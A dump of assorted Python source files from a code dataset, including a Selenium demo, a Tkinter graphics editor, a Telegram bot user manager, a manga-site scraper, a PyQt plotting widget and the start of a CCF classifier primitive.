)\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n parser.require_tag_content(\n 'title',\n ('div', {'class':'wrong-class'})\n )\n parser.parse()\n self.assertEqual(0, len(parser.parsed_data))\n\n def tearDown(self):\n pass\n\n def _show_parser(self, parser_type=\"good\"):\n if parser_type == \"broken\":\n parser = self.broken_parser\n else:\n parser = self.parser\n for item in parser.parsed_data:\n print (item)\n \n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"32788226","text":"# coding=utf-8\nfrom selenium import webdriver\n\n# 利用JavaScript 操作页面元素\ndriver = webdriver.Chrome()\ndriver.maximize_window()\ndriver.get(\"https://www.baidu.com\")\nprint(f'current url is {driver.current_url}')\nprint(f'window handle is {driver.current_window_handle}')\njs = \"document.getElementById('kw').value = 'selenium'\" # 可以在console里面执行这条命令\ndriver.execute_script(js)\nimport time\ntime.sleep(2)\ndriver.quit()\n","sub_path":"Python3_Selenium3/第6章/6.28_js.py","file_name":"6.28_js.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"367342876","text":"#part 1\n# with open (\"D1_input.txt\", 'r') as file: \n# sum = 0\n# for line in file: \n# value = line.rstrip('\\n')\n# value = int(value) \n# value = (value//3 - 2)\n# sum += value\n# print (sum)\n\n#part 2 \nwith open (\"D1_input.txt\", 'r') as file: \n sum = 0\n for line in file: \n value = line.rstrip('\\n')\n value = int(value) \n valueSum = 0\n fuel = value\n while fuel > 5:\n fuel = fuel // 3 - 2\n valueSum += fuel\n sum += valueSum\n print (sum)\n","sub_path":"D1.py","file_name":"D1.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"53235168","text":"import tkinter as tk\nfrom functools import partial\nimport re\n\n\nclass Application(tk.Frame):\n\n def __init__(self, master=None, title=\"\", **kwargs):\n super().__init__(master, **kwargs)\n self.master.title(title)\n self.master.columnconfigure(0, weight=1)\n self.master.columnconfigure(1, weight=1)\n self.master.rowconfigure(0, weight=1)\n self.grid(sticky=\"NEWS\")\n self.create_widgets()\n for column in range(self.grid_size()[0]):\n self.columnconfigure(column, weight=1)\n for row in range(self.grid_size()[1]):\n self.rowconfigure(row, weight=1)\n\n def create_widgets(self):\n pass\n\n\nclass App(Application):\n def create_text(self):\n self.text = tk.Text(self, undo=True, wrap=tk.WORD)\n self.text.grid(row=0, column=0, sticky=\"NEWS\")\n self.text.bind('', self.on_insert_text)\n\n def create_canvas(self):\n self.canvas = tk.Canvas(self)\n self.canvas.grid(row=0, column=1, sticky=\"NEWS\")\n self.canvas.bind('', self.canvas_click)\n self.canvas.bind('', self.on_motion)\n\n def canvas_click(self, event):\n overlap = self.canvas.find_overlapping(event.x, event.y, event.x + 1, event.y + 1)\n if overlap:\n return\n self.create_object(event.x, event.y)\n self.create_row_text()\n\n def create_row_text(self):\n obj_info = {\n 'type': self.canvas.type(self.current_obj),\n 'coord': self.canvas.coords(self.current_obj),\n 'border_color': self.canvas.itemcget(self.current_obj, 'outline'),\n 'fill_color': self.canvas.itemcget(self.current_obj, 'fill'),\n 'width': self.canvas.itemcget(self.current_obj, 'width')\n }\n self.text.insert(\n tk.END,\n f'{obj_info[\"type\"]}: <{obj_info[\"coord\"]}> {obj_info[\"width\"]} {obj_info[\"border_color\"]} {obj_info[\"fill_color\"]} \\n'\n )\n\n def create_object(self, x, y):\n self.current_start = x, y\n self.current_end = x + 10, y + 10\n self.current_obj = self.canvas.create_oval(*self.current_start, *self.current_end, fill=\"white\")\n self.canvas.tag_bind(self.current_obj, '', partial(self.object_click, self.current_obj))\n\n def object_click(self, tag, event):\n self.current_obj_start = event.x, event.y\n self.current_obj_coord = self.canvas.coords(tag)\n self.current_obj = ''\n self.canvas.tag_bind(tag, '', partial(self.object_movement, tag))\n\n def object_movement(self, tag, event):\n x1, y1, x2, y2 = self.current_obj_coord\n start_x, start_y = self.current_obj_start\n diff_x = event.x - start_x\n diff_y = event.y - start_y\n\n w, h = self.winfo_width(), self.winfo_height()\n if x1 + diff_x >= 0 and x2 + diff_x <= h and y1 + diff_y >= 0 and y2 + diff_y <= w:\n self.canvas.coords(tag, x1 + diff_x, y1 + diff_y, x2 + diff_x, y2 + diff_y)\n self.change_text(tag, x1 + diff_x, y1 + diff_y, x2 + diff_x, y2 + diff_y)\n\n def on_motion(self, event):\n overlap = self.canvas.find_overlapping(event.x, event.y, event.x + 1, event.y + 1)\n if overlap:\n return\n\n # change obj coords\n self.canvas.coords(self.current_obj, *self.current_start, event.x, event.y)\n\n # change text coords\n self.change_text(self.current_obj, *self.current_start, event.x, event.y)\n\n def change_text(self, tag, x1, y1, x2, y2):\n if tag == '':\n return\n line = self.text.get(f'{tag}.0', f'{int(tag) + 1}.0')\n s = line.find('<')\n e = line.find('>')\n line = line[:s + 1] + f'{[x1, y1, x2, y2]}' + line[e:]\n self.text.delete(f'{tag}.0', f'{int(tag) + 1}.0')\n self.text.insert(\n f'{tag}.0',\n line\n )\n\n def on_insert_text(self, event):\n tag = int(self.text.index(tk.INSERT)[:1])\n line = self.text.get(f'{tag}.0', f'{int(tag) + 1}.0')\n configs = line.split(' ')\n line_reg = r'oval: <\\[(([0-9]{1,3}|[0-9]{1,3}\\.[0-9]{1,2}), ){3}([0-9]{1,3}|[0-9]{1,3}\\.[0-9]{1,2})\\]> ([0-9]{1,3}\\.[0-9]{1,2}) .+\\n$'\n try:\n if not re.match(line_reg, line):\n raise Exception('Wrong format!')\n type, x1, y1, x2, y2, width, outline_color, fill_color, new_line = configs\n self.canvas.itemconfig(tag, width=width, outline=outline_color, fill=fill_color)\n self.canvas.coords(tag, x1[2:-1], y1[:-1], x2[:-1], y2[:-2])\n self.text.tag_delete(f'red{tag}.0{int(tag) + 1}.0')\n except Exception as e:\n self.text.tag_add(f'red{tag}.0{int(tag) + 1}.0', f'{tag}.0', f'{int(tag) + 1}.0')\n self.text.tag_configure(f'red{tag}.0{int(tag) + 1}.0', background='red')\n\n def create_widgets(self):\n self.create_text()\n self.create_canvas()\n\n\napp = App(title=\"Graphics Editor\")\napp.mainloop()\n","sub_path":"05_SshAndSmartWidgents/GraphicsEditor.py","file_name":"GraphicsEditor.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"595749435","text":"from telegram.ext import CommandHandler\nfrom .base import MetafetishPickleDBBase\nimport cgi\n\n\nclass UserNotFoundException(Exception):\n pass\n\n\nclass UserFlagGroupNotFoundException(Exception):\n pass\n\n\nclass UserManager(MetafetishPickleDBBase):\n def __init__(self, dbdir, cm):\n super().__init__(__name__, dbdir, \"users\", True)\n self.has_admin = True\n if self.get_num_users() == 0:\n self.has_admin = False\n self.cm = cm\n\n def register_with_dispatcher(self, dispatcher):\n dispatcher.add_handler(CommandHandler('register', self.register))\n dispatcher.add_handler(CommandHandler('profile_hide',\n self.set_hide_profile))\n dispatcher.add_handler(CommandHandler('profile_show',\n self.set_show_profile))\n\n def get_num_users(self):\n return len(self.db.getall())\n\n def is_valid_user(self, user_id):\n if str(user_id) in self.db.getall():\n return True\n return False\n\n def register(self, bot, update):\n user_id = str(update.message.from_user.id)\n if self.is_valid_user(user_id):\n return\n # Use the user_id as the dictionary key. Unfortunately the id is an\n # int so this requires casting to make sure comparisons work.\n user_db = {\"flags\": [\"admin\" if not self.has_admin else \"\"],\n \"fields\": {},\n \"show_profile\": False,\n \"username\": update.message.from_user.username,\n \"displayname\": \"%s %s\" % (update.message.from_user.first_name,\n update.message.from_user.last_name)}\n if not self.has_admin:\n bot.sendMessage(update.message.chat.id,\n text=\"You're the first user, therefore you're the admin.\",\n parse_mode=\"HTML\")\n self.has_admin = True\n self.db.set(str(user_id), user_db)\n\n def help(self, bot, update):\n bot.sendMessage(update.message.chat.id,\n text=\"\"\"\nUser Module\n\nThe user module allows users to create profiles for themselves.\n\nEach user can also have profiles, which consists of a field name (with no whitespace) and description of that field. This allows users to share whatever information they might want about themselves. Profiles sharing is offby default, and can be turned on and off as needed.\n\nNote that field names are case insensitive for search, but will display as entered.\n\nCommands\n\n%s\n\"\"\" % (self.commands()),\n parse_mode=\"HTML\")\n\n def commands(self):\n return \"\"\"/userhelp - Display users help message.\n/useraddfield - Add or update a profile field.\n/userrmfield - Remove a profile field.\n/usershowprofile - Turn profile sharing on.\n/userhideprofile - Turn profile sharing off.\n/userprofile - Show the profile of another user.\"\"\"\n\n def show_profile(self, bot, update, show_profile):\n user_id = str(update.message.from_user.id)\n self.db.dadd(user_id, (\"show_profile\", show_profile))\n bot.sendMessage(update.message.chat.id,\n text=\"Profile display is now turned %s.\" % (\"ON\" if show_profile else \"OFF\"),\n parse_mode=\"HTML\")\n\n def get_user_by_name_or_id(self, user_name_or_id):\n user_id = None\n user = None\n if user_name_or_id in self.db.getall():\n user_id = user_name_or_id\n user = self.db.get(user_name_or_id)\n else:\n for id in self.db.getall():\n data = self.db.get(id)\n if data[\"username\"] == user_name_or_id:\n user_id = id\n user = data\n return (user_id, user)\n\n def edit_flag_conversation(self, bot, update, remove):\n bot.sendMessage(update.message.chat.id,\n text=\"What is the name or id of the user who you'd like to edit flags for?\")\n while True:\n (bot, update) = yield\n user_name_or_id = update.message.text\n (user_id, user) = self.get_user_by_name_or_id(user_name_or_id)\n if user_id:\n break\n bot.sendMessage(update.message.chat.id,\n text=\"I can't find that user in my database, please try again or /cancel.\")\n\n bot.sendMessage(update.message.chat.id,\n text=\"What is the name of the flag you would like to edit for %s?\" % (user[\"username\"]))\n # TODO: show permissions flag keyboard here\n (bot, update) = yield\n user_flag = update.message.text\n if remove:\n if user_flag not in user[\"flags\"]:\n user[\"flags\"].append(user_flag)\n self.db.set(user_id, user)\n bot.sendMessage(update.message.chat.id,\n text=\"Added flag %s to %s\" % (user_flag, user_name_or_id))\n else:\n bot.sendMessage(update.message.chat.id,\n text=\"User %s already has flag %s\" % (user_name_or_id, user_flag))\n else:\n if user_flag in user[\"flags\"]:\n user[\"flags\"].remove(user_flag)\n self.db.set(user_id, user)\n bot.sendMessage(update.message.chat.id,\n text=\"Removed flag %s from %s\" % (user_flag, user_name_or_id))\n else:\n bot.sendMessage(update.message.chat.id,\n text=\"User %s does not have flag %s\" % (user_name_or_id, user_flag))\n\n def add_flag(self, bot, update):\n c = self.edit_flag_conversation(bot, update, True)\n c.send(None)\n self.cm.add(update, c)\n\n def remove_flag(self, bot, update):\n c = self.edit_flag_conversation(bot, update, False)\n c.send(None)\n self.cm.add(update, c)\n\n def has_flag(self, user_id, flag):\n if type(user_id) is not str:\n user_id = str(user_id)\n try:\n user = self.db.get(user_id)\n except KeyError:\n return False\n if flag in user[\"flags\"]:\n return True\n return False\n\n def get_fields(self, bot, update):\n try:\n (prof_command, prof_name) = update.message.text.split()\n except:\n prof_name = update.message.from_user.username\n self.logger.warn(\"NAME %s\" % prof_name)\n (user_id, user) = self.get_user_by_name_or_id(prof_name)\n if not user_id or not user[\"show_profile\"]:\n bot.sendMessage(update.message.chat.id,\n text=\"User not found, or does not have a public profile\")\n return\n fields = \"User Profile for %s\\n\\n\" % (prof_name)\n for (k, v) in user[\"fields\"].items():\n fields += \"%s\\n\\n%s\\n\\n\" % (k, v)\n bot.sendMessage(update.message.chat.id,\n text=fields,\n parse_mode=\"HTML\",\n disable_web_page_preview=True)\n\n def add_field_conversation(self, bot, update):\n user_id = str(update.message.from_user.id)\n bot.sendMessage(update.message.chat.id,\n text=\"What is the name of the profile field you'd like to add?\")\n (bot, update) = yield\n field_name = cgi.escape(update.message.text.strip())\n bot.sendMessage(update.message.chat.id,\n text=\"What would you like to set field %s to?\" % (field_name))\n # TODO: show permissions flag keyboard here\n (bot, update) = yield\n field_value = cgi.escape(update.message.text.strip())\n user = self.db.get(user_id)\n user[\"fields\"][cgi.escape(field_name)] = cgi.escape(field_value)\n self.db.set(user_id, user)\n bot.sendMessage(update.message.chat.id,\n text=\"Field %s is now set/updated in your profile.\" % (field_name))\n\n def remove_field_conversation(self, bot, update):\n user_id = str(update.message.from_user.id)\n bots.sendMessage(update.message.chat.id,\n text=\"What is the name of the profile field you'd like to remove?\")\n (bot, update) = yield\n field_name = cgi.escape(update.message.text.strip())\n user = self.db.get(user_id)\n try:\n del user[\"fields\"][cgi.escape(field_name)]\n except KeyError:\n bot.sendMessage(update.message.chat.id,\n text=\"Can't find field %s in your profile.\" % (field_name))\n return\n bot.sendMessage(update.message.chat.id,\n text=\"Field %s has been removed from your profile.\" % (field_name))\n\n def add_field(self, bot, update):\n c = self.add_field_conversation(bot, update)\n c.send(None)\n self.cm.add(update, c)\n\n def remove_field(self, bot, update):\n c = self.remove_field_conversation(bot, update)\n c.send(None)\n self.cm.add(update, c)\n\n def show_list(self, bot, update):\n users = \"User list:\\n\\n\"\n for k in self.db.getall():\n user_info = self.db.get(k)\n users += \"- %s : %s : %s\\n\" % (user_info[\"username\"],\n user_info[\"displayname\"],\n k)\n bot.sendMessage(update.message.chat.id,\n text=users)\n","sub_path":"mowcounterbot/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":9470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"143746966","text":"from manmandon.provider import MMDChapterListProvider, MMDChapterProvider\nfrom pathlib import Path\nimport json\nfrom urllib.parse import urljoin\nfrom manmandon.util import parse_url_fname\nimport click\n\nclass DMZJChapters(MMDChapterListProvider):\n\n patterns = [\n r\"^https://(www\\.)?dmzj\\.com/info/[a-z]+/?$\"\n ]\n\n def resolve(self, uri):\n self.driver.get(uri)\n res = self.execute(Path(__file__).parent / \"chapters.js\")\n return json.loads(res)\n\nclass DMZJChapters2(MMDChapterListProvider):\n\n patterns = [\n r\"^https://manhua\\.dmzj\\.com/[a-z]+/?$\"\n ]\n\n def resolve(self, uri):\n self.driver.get(uri)\n res = self.execute(Path(__file__).parent / \"chapters2.js\")\n return json.loads(res)\n\nclass DMZJChapter(MMDChapterProvider):\n\n patterns = [\n r\"^https://manhua\\.dmzj\\.com/[a-z]+/\\d+\\.shtml/?$\"\n ]\n\n scope = []\n\n def flip(self):\n from selenium.webdriver.common.keys import Keys\n self.driver.find_element_by_tag_name(\"body\").send_keys(Keys.ARROW_RIGHT)\n\n def resolve(self, uri):\n\n self.driver.get(uri)\n res = self.execute(Path(__file__).parent / \"images.js\")\n img_urls = json.loads(res)\n directory = self.output_directory / self.driver.title\n directory.mkdir(exist_ok=True)\n\n with click.progressbar(length=len(img_urls), label=self.driver.title, show_pos=True) as bar:\n bar.update(0)\n for i, img_url in enumerate(img_urls):\n img_url = urljoin(\"https://images.dmzj.com/\", img_url)\n fname = directory / parse_url_fname(img_url)\n if not fname.exists():\n req = self.driver.wait_for_request(img_url, timeout=60)\n with open(fname, \"wb\") as fp:\n fp.write(req.response.body)\n self.sleep(3)\n bar.update(1)\n self.flip()\n\n del self.driver.requests\n\nproviders = [\n DMZJChapters,\n DMZJChapters2,\n DMZJChapter\n]\n","sub_path":"providers/dmzj/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"125208680","text":"from PyQt5.QtWidgets import (QApplication, QComboBox, QGridLayout, QGroupBox, QLabel, QPushButton,\n QFileDialog, QMessageBox, QWidget, QSizePolicy, QCheckBox, QTableWidget, QVBoxLayout,\n QTableWidgetItem, QLineEdit)\nfrom PyQt5.QtGui import QDoubleValidator, QIntValidator\nfrom matplotlib.backends.backend_qt5agg import FigureCanvas \nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport warnings, os, time\nfrom skimage.io import imsave\nimport scipy.ndimage as ndi\nfrom scipy.stats import ttest_ind\nfrom matplotlib.figure import Figure\nimport matplotlib.cm as cm\nfrom scipy.interpolate import interp1d\nimport matplotlib as mpl\nwarnings.filterwarnings(\"ignore\")\nfrom matplotlib import rc\nrc('font', size=12)\nrc('font', family='Arial')\n# rc('font', serif='Times')\nrc('pdf', fonttype=42)\n# rc('text', usetex=True)\n\nclass visualization_0d(QWidget):\n def __init__(self, data, name, background=None, colormap='gnuplot', parent=None):\n super(visualization_0d, self).__init__(parent)\n\n self.data = data\n self.dataPlot = data\n self.name = name\n if not background:\n self.background = [[0 for gastruloids in group] for group in data]\n else:\n self.background = background\n self.colormap = colormap\n\n self.make()\n\n def make(self):\n self.figure = Figure(figsize=(4, 4), dpi=100)\n self.canvas = FigureCanvas(self.figure)\n self.canvas.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n\n self.plotType = QComboBox()\n self.plotType.addItem('bar')\n self.plotType.addItem('violinplot')\n self.plotType.addItem('boxplot')\n\n self.colormap = QComboBox()\n self.colormap.addItem('jet')\n self.colormap.addItem('rainbow')\n self.colormap.addItem('gnuplot')\n self.colormap.addItem('gnuplot2')\n self.colormap.addItem('brg')\n self.colormap.addItem('tab10')\n self.colormap.addItem('Spectral')\n self.colormap.addItem('coolwarm')\n self.colormap.addItem('seismic')\n self.colormap.addItem('cool')\n self.colormap.addItem('spring')\n self.colormap.addItem('summer')\n self.colormap.addItem('autumn')\n self.colormap.addItem('winter')\n\n self.YnormBtn = QComboBox()\n self.YnormBtn.addItem('No normalization')\n self.YnormBtn.addItem('Global percentile')\n self.YnormBtn.addItem('Group percentile')\n self.YnormBtn.addItem('Manual')\n\n self.bckgBtn = QComboBox()\n self.bckgBtn.addItem('None')\n self.bckgBtn.addItem('Background')\n\n self.pxlsize = QLineEdit()\n self.pxlsize.setValidator( QDoubleValidator(0, 1000000, 5, notation=QDoubleValidator.StandardNotation) )\n self.pxlsize.setText('1.0')\n self.dimensionality = QLineEdit()\n self.dimensionality.setValidator( QIntValidator() )\n self.dimensionality.setText('1')\n\n self.groupSelection = self.makeGroupSelectionBtns()\n\n self.applyBtn = QPushButton('Apply Settings')\n self.applyBtn.clicked.connect(self.remakePlot)\n\n self.ttestBtn = QPushButton('Compute statistics')\n self.ttestBtn.clicked.connect(self.computeTtest)\n \n self.savexlsxBtn = QPushButton('Save Data as xlsx')\n self.savexlsxBtn.clicked.connect(self.saveData)\n\n lay = QGridLayout(self)\n lay.setSpacing(10)\n lay.addWidget(NavigationToolbar(self.canvas, self), 0,0,1,2)\n lay.addWidget(self.canvas, 1,0,1,2)\n lay.addWidget(QLabel('Y axis normalization:'), 2,0,1,1)\n lay.addWidget(self.YnormBtn, 2,1,1,1)\n lay.addWidget(QLabel('Background subtraction type:'), 3,0,1,1)\n lay.addWidget(self.bckgBtn, 3,1,1,1)\n lay.addWidget(QLabel('Pixel size/Scaler:'), 4,0,1,1)\n lay.addWidget(self.pxlsize, 4,1,1,1)\n lay.addWidget(QLabel('Dimensionality:'), 5,0,1,1)\n lay.addWidget(self.dimensionality, 5,1,1,1)\n lay.addWidget(QLabel('Plot type:'), 6,0,1,1)\n lay.addWidget(self.plotType, 6,1,1,1)\n lay.addWidget(QLabel('Colormap:'), 7,0,1,1)\n lay.addWidget(self.colormap, 7,1,1,1)\n lay.addWidget(self.groupSelection, 8,0,1,2)\n lay.addWidget(self.applyBtn, 9,0,1,2)\n lay.addWidget(self.ttestBtn, 10,0,1,2)\n lay.addWidget(self.savexlsxBtn, 11,0,1,2)\n\n self.remakePlot()\n\n self.setWindowTitle(self.name)\n QApplication.setStyle('Fusion')\n\n def makeGroupSelectionBtns(self):\n group = QGroupBox(\"Groups to plot\")\n self.groupPlotBtn = []\n for i in range(len(self.data)):\n self.groupPlotBtn.append(QCheckBox('Group '+str(i)))\n self.groupPlotBtn[-1].setChecked(True)\n \n self.legendBtn = QCheckBox('Legend')\n self.legendBtn.setChecked(False)\n\n self.rawBtn = QCheckBox('Plot raw data')\n self.rawBtn.setChecked(True)\n\n lay = QGridLayout()\n for i in range(len(self.data)):\n lay.addWidget(self.groupPlotBtn[i],i,0,1,1)\n lay.addWidget(self.legendBtn,0,1,1,1)\n lay.addWidget(self.rawBtn,1,1,1,1)\n\n group.setLayout(lay)\n return group\n\n def remakePlot(self):\n\n self.figure.clear()\n ax = self.figure.add_subplot(111)\n self.figure.subplots_adjust(top=0.95,right=0.95,left=0.15,bottom=0.15)\n ax.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(2,2))\n ax.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,2))\n ax.set_ylabel(self.name)\n\n n_groups = len(self.data)\n n_gastr = [len(self.data[group_idx]) for group_idx in range(n_groups)]\n\n # define colors\n cmap = cm.get_cmap(self.colormap.currentText())\n if n_groups == 1:\n colors = [cmap(0)]\n elif self.colormap.currentText()=='tab10':\n colors = [cmap(i) for i in range(n_groups)]\n else:\n colors = [cmap(i/(n_groups-1)) for i in range(n_groups)]\n\n # rearrange dataset\n data = [list(self.data[i].values) for i in range(n_groups)]\n\n # subtract background or not\n if self.bckgBtn.currentText() == 'Background':\n for i in range(n_groups):\n for k in range(n_gastr[i]):\n data[i][k] -= self.background[i][k]\n\n # normalize fluorescence intensity accordingly\n if self.YnormBtn.currentText() == 'Global percentile':\n flat = []\n for i in range(n_groups):\n for j in range(n_gastr[i]):\n flat.append(data[i][j])\n percs = np.percentile(np.array(flat),(.3,99.7))\n for i in range(n_groups):\n data[i] = np.clip((data[i]-percs[0])/(percs[1]-percs[0]),0.,1.)\n elif self.YnormBtn.currentText() == 'Group percentile':\n for i in range(n_groups):\n percs = np.percentile(np.array(data[i]),(.3,99.7))\n data[i] = np.clip((data[i]-percs[0])/(percs[1]-percs[0]),0.,1.)\n\n # use pixel size value and dimensionality\n for i in range(n_groups):\n for j in range(int(self.dimensionality.text())):\n data[i] = [v*float(self.pxlsize.text()) for v in data[i]]\n\n # make plot\n lines = []\n for i in range(n_groups):\n if self.groupPlotBtn[i].isChecked():\n # print(data)\n mean = np.mean(data[i])\n std= np.std(data[i])\n\n if self.plotType.currentText()=='bar':\n parts = ax.bar(i,mean,yerr=std,color=colors[i])\n elif self.plotType.currentText()=='violinplot':\n if data[i]!=[]:\n parts = ax.violinplot(data[i],[i],showmeans=True,showextrema=True)\n for pc in parts['bodies']:\n pc.set_color(colors[i])\n pc.set_alpha(0.5)\n parts = parts['bodies']\n elif self.plotType.currentText()=='boxplot':\n if data[i]!=[]:\n parts = ax.boxplot(data[i], positions=[i],\n notch=True,\n patch_artist=True)\n for item in ['boxes', 'whiskers', 'fliers', 'medians', 'caps']:\n plt.setp(parts[item], color=colors[i])\n plt.setp(parts[\"boxes\"], facecolor=colors[i])\n plt.setp(parts[\"boxes\"], alpha=.5)\n plt.setp(parts[\"fliers\"], markeredgecolor=colors[i])\n parts = parts['boxes']\n lines.append(parts[0])\n\n if self.rawBtn.isChecked():\n x = np.random.normal(i, 0.04, size=len(data[i]))\n ax.plot(x,data[i],'ok',alpha=.7,ms=2)\n\n # adjust axes lims\n ax.set_ylim(0,None)\n group_names = []\n for i in range(n_groups):\n if self.groupPlotBtn[i].isChecked():\n group_names.append('Group'+str(i+1))\n # print(groups)\n ax.set_xticks(range(len(group_names)))\n ax.set_xticklabels(group_names, rotation=15, fontsize=12)\n\n # add legend\n if self.legendBtn.isChecked():\n l = ax.legend(lines,group_names)\n l.get_frame().set_linewidth(0.0)\n\n self.dataPlot = data\n self.canvas.draw()\n\n def saveData(self):\n name,_ = QFileDialog.getSaveFileName(self, 'Save Data as xlsx File')\n fname, ext = os.path.splitext(name)\n if ext == '':\n name = name+'.xlsx'\n elif ext != '.xlsx':\n name = fname+'.xlsx'\n fname, ext = os.path.splitext(name)\n\n df = pd.DataFrame(self.dataPlot)\n df = df.transpose()\n df.columns =['Group '+str(i) for i in range(len(self.dataPlot))]\n df.to_excel(name)\n\n def computeTtest(self):\n n_groups = len(self.dataPlot)\n pvals = np.zeros((n_groups, n_groups))\n for i in range(n_groups):\n for j in range(n_groups):\n _, pvals[i,j] = ttest_ind(self.dataPlot[i], self.dataPlot[j])\n self.w = TtestTable(pvals)\n self.w.show()\n\nclass TtestTable(QWidget):\n def __init__(self, pvals, parent=None):\n super(TtestTable, self).__init__(parent)\n self.pvals = pvals\n\n self.setWindowTitle( \"Ttest: P values\" )\n self.createTable() \n\n self.saveBtn = QPushButton('Save pvals')\n self.saveBtn.clicked.connect(self.saveData)\n\n self.layout = QVBoxLayout() \n self.layout.addWidget(self.tableWidget) \n self.layout.addWidget(self.saveBtn)\n\n self.setLayout(self.layout)\n\n def createTable(self,):\n self.tableWidget = QTableWidget()\n n_groups = self.pvals.shape[0]\n\n #Row count \n self.tableWidget.setRowCount(n_groups) \n #Column count \n self.tableWidget.setColumnCount(n_groups)\n\n for i, row in enumerate(self.pvals):\n for j, val in enumerate(row):\n self.tableWidget.setItem(i,j, QTableWidgetItem('%.5f'%val))\n \n def saveData(self):\n n_groups = self.pvals.shape[0]\n name,_ = QFileDialog.getSaveFileName(self, 'Save Data as xlsx File')\n fname, ext = os.path.splitext(name)\n if ext == '':\n name = name+'.xlsx'\n elif ext != '.xlsx':\n name = fname+'.xlsx'\n fname, ext = os.path.splitext(name)\n\n df = pd.DataFrame(self.pvals)\n df = df.transpose()\n df.columns =['Group '+str(i) for i in range(n_groups)]\n df.index =['Group '+str(i) for i in range(n_groups)]\n # df = df.rename(index=['Group '+str(i) for i in range(len(self.dataPlot))])\n\n df.to_excel(name)\n\n","sub_path":"morgana/GUIs/visualize0d.py","file_name":"visualize0d.py","file_ext":"py","file_size_in_byte":12251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"106482107","text":"from d3m import container\nfrom d3m import utils as d3m_utils\nfrom d3m.container import pandas # type: ignore\nfrom d3m.primitive_interfaces import base\nfrom d3m.metadata import base as metadata_base, hyperparams, params\nfrom d3m.base import utils as base_utils\nfrom d3m.exceptions import PrimitiveNotFittedError\nfrom d3m.primitive_interfaces.base import CallResult\nfrom d3m.primitive_interfaces.supervised_learning import SupervisedLearnerPrimitiveBase\nfrom common_primitives.dataframe_to_ndarray import DataFrameToNDArrayPrimitive\nfrom common_primitives.ndarray_to_dataframe import NDArrayToDataFramePrimitive\n\n# Import config file\nfrom primitives_ubc.config_files import config\n\n# Import relevant libraries\nimport os\nimport time\nimport logging\nimport scipy.io\nimport numpy as np # type: ignore\nimport pandas as pd # type: ignore\nfrom collections import OrderedDict\nfrom typing import Any, cast, Dict, List, Union, Sequence, Optional, Tuple\n\n# Import CCFs functions\nfrom primitives_ubc.clfyCCFS.src.generate_CCF import genCCF\nfrom primitives_ubc.clfyCCFS.src.predict_from_CCF import predictFromCCF\n\n__all__ = ('CanonicalCorrelationForestsClassifierPrimitive',)\nlogger = logging.getLogger(__name__)\n\nInputs = container.DataFrame\nOutputs = container.DataFrame\n\n\nclass Params(params.Params):\n CCF_: Optional[Dict]\n attribute_columns_names: Optional[List[str]]\n target_columns_metadata: Optional[List[OrderedDict]]\n target_columns_names: Optional[List[str]]\n\n\nclass Hyperparams(hyperparams.Hyperparams):\n \"\"\"\n Hyper-parameters for this primitive.\n \"\"\"\n # Global Hyperparams\n global default_projdict\n default_projdict = OrderedDict()\n default_projdict['CCA'] = True\n\n nTrees = hyperparams.UniformInt(\n lower=1,\n upper=10000,\n default=100,\n description=\"Number of trees to create.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/TuningParameter',\n 'https://metadata.datadrivendiscovery.org/types/ResourcesUseParameter',\n ],\n )\n parallelprocessing = hyperparams.UniformBool(\n default=True,\n description=\"Use multi-cpu processing.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n lambda_ = hyperparams.Enumeration[str](\n values=['log', 'sqrt', 'all'],\n default='log',\n description=\"Number of features to subsample at each node\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n splitCriterion = hyperparams.Enumeration[str](\n values=['info', 'gini'],\n default='gini',\n description=\"Split criterion/impurity measure to use. Default is 'info' for classification with is entropy impurity/information split criterion.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/TuningParameter']\n )\n minPointsLeaf = hyperparams.Hyperparameter[int](\n default=2,\n description=\"Minimum number of points allowed a leaf node for split to be permitted.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n bSepPred = hyperparams.UniformBool(\n default=False,\n description=\"Whether to predict each class seperately as a multilabel classification problem (True) or treat classes within the same output as mutually exclusive (False)\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n taskWeights = hyperparams.Enumeration[str](\n values=['even', 'uneven'], # TODO: Add support for inputing weights list, currently only even supported.\n default='even',\n description=\"Weights to apply to each output task in calculating the gain.\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n bProjBoot = hyperparams.Enumeration[Union[bool, str]](\n values=['default', True, False],\n default='default',\n description=\"Whether to use projection bootstrapping. If set to default, then true unless lambda=D, i.e. we all features at each node. In this case we resort to bagging instead of projection bootstrapping\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n bBagTrees = hyperparams.Enumeration[Union[bool, str]](\n values=['default', True, False],\n default='default',\n description=\"Whether to use Breiman's bagging by training each tree on a bootstrap sample\",\n semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter']\n )\n projections = hyperparams.Hyperparameter[dict](\n default=default_projdict,\n 